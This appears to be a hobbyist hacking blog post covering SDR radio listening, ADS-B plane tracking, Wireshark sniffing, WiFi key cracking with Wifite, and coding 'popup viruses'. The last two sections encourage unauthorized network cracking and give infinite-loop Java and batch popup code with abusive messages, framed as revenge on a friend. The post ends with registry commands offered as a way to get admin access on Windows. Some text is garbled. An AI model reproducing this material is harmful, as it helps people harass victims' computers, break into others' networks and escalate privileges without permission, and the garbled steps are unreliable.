Listening to WFM radio......

Mostly SDR is similar to a radio receiver which can be used to listen to the transmissions on any frequency. In simple words it is like a radio receiver present on police cars, boats and small airplanes. 

Requirements:-
  1. Sdr dongle(antenna + front end)
  2. SDR#(decoder and interface)
If you are using sdr for the first time then we will advice you to follow the easy installation on rtl-sdr.org which helps you to install all the required drivers correctly.

How to?
  1. After extracting the files, run the intall.bat file.
  2. After the files are downloaded, open the sdrsharp folder and run the sdrsharp application program. 
  3. Now hit the configure button and then hit close.


  4. Then select WFM and hit an the play button. If it doesn't work adjust the rf gain.
  5. Now change the frequency to your desired frequency by clicking on the frequency(in example the frequency is 98.3 Mhz).


Note:-
I will not advice you to listen on frequency used by the police department and other services.

Tracking Airplanes with sdr....

ADSB is the shot form of Automatic Dependent Surveillance–Broadcast is a kind of packet sent out by every plane in the sky this packet helps the ground station to locate an aircraft in the air.All aircraft transponders transmit data at the frequency 1090 MHz. To receive this transmissions one needs a receiver for this frequency - an ADS-B-receiver. The main flaw in this system is that there is no encryption of packets which mean anyone with the right setup can track planes.


Requirements:-
  1. Sdr dongle(antenna + front end)
  2. adsbsharp(decoder)
  3. adsbscope(interface software)



setup

If you are using sdr for the first time then we will advice you to follow the easy installation on rtl-sdr.org which helps you to install all the required drivers correctly.

How to?

  1. First from the sdrsharp package run the adsb# application( Just hit on start don't change anything).
  2. Now keep the adsb# running and open the adscscope application. Now click on other and then click on Network setup.
  3. Now configure your decoder by selecting adsb# and your machine by clicking on local host.
  4. Hit close and exit and go to network and select raw data client.
  5. Now after a few minutes you will see a few planes on the map and their details will be displayed on  the right panel.



Note:-
The dongle used in the demonstration is only a receiver and hence it cannot send anything thus you don't need any special permission for using it.
  

Sniffing with Wireshark!!!

Wireshark is a network protocol analyzer which helps you to
tshark-i mon0
 sniff, store and analyze network traffic. It is built on top of tshark but displays everything in a more systematic way . It is available for almost all operating systems. The software consist of various filters which are used to filter specific packets which you want to analyze.

Now whenever you start Wireshark you will have to select an interface for the list of interfaces. This decides that what all traffic you will be able to capture. To capture all the traffic in air with your wireless chip you can select the monitoring mode enabled card. To capture the all the traffic on a specific frequency you can also select your rtl-sdr.
using mon0 interface.
The best thing about Wireshark is that it can be integrated with different types of hardware and software. There are millions of Wireshark filters so you cannot memorize all of them but you can always refer to them whenever you want on https://www.wireshark.org/.


The only way to learn Wireshark is by experimenting. To get a copy you can download form the following link.

Automated wireless hacking: wifi hacking the easy way!!!!!

Wifite is a python script which automates all the required process for wireless hacking. This script attempts all the wireless exploits one by one till it gets the key of the wireless network. The best tool for lazy hackers. :p



Requirements:-

  • A wireless card with monitoring mode.
  • Wifite.py file (It is already installed in Kali Linux).


we will use Kali Linux for our demonstration.

How to?

  1. Open a new terminal type wifite(in case of Kali for other distributions you might have to type ./python wifite.py ) 
  2. Select your interface name, in our case we only had one interface so we can skip this step.
  3. Now select the network which you want to hack we only have one network so we will give 1.
  4. Now wait till the script cracks the WEP or WAP key to give you an WEP key for the network.


Note:-

If you want to set the parameter at the beginning you can do that as well which means that the script will use these parameter from the beginning  to check parameters you can type wifite -h .
You can also crack the hash if the script is unable to do so with other hash cracking scripts like hashcat and aircrack-ng.


Coding popup virus....

Viruses have always been an important part of hacking for a long time. These malicious programs can help you perform specific commands on any victim computer. These are very helpful when you want to take revenge from a friend.  So we decided to teach you how to code popup viruses which are non lethal to the victim's computer.

How to?

  1. The first step to code a nice virus is deciding what you want to display on your friend's computer. The commonly used phrases are "you are a dick" ," pay for your sins " and "f@## you!" , now the first thing to remember that these messages should be in string data type.
  2. The second part to create a popup virus is the infinite loop, this is a loo that has no end point. For example if you are coding a java virus your popup command should be inside while(true) {  }.
  3. The last step to save the file with suitable extension. For example if you are creating a bat file then you should save the program as filename.bat or if you are coding a java virus then you will need to save the files in the form of a jar executable  file.
Sample codes:-

Java code:-
 private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {           
        while(true)
        {
        JOptionPane.showMessageDialog(this,"fuck you","pay for your sins",3);
        }

    } 

Batch code:-
:top
@echo off
msg * (you fucked my life)
cls
msg * (now my turn)

cls
GOTOtop

Note:-
For developing java viruses we will advice you to use netbeans as it makes the process of coding a lot easy. And as far as .bat scripting is considered notepad is the best tool you can use.

In batch viruses you can use code like 
start iexplore.exe "www.google.com"

START %SystemRoot%\system32\notepad.exe
to open notepad and internet explorer. 

You can also use the code by a google researcher to get admin access on windows:
reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp

reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp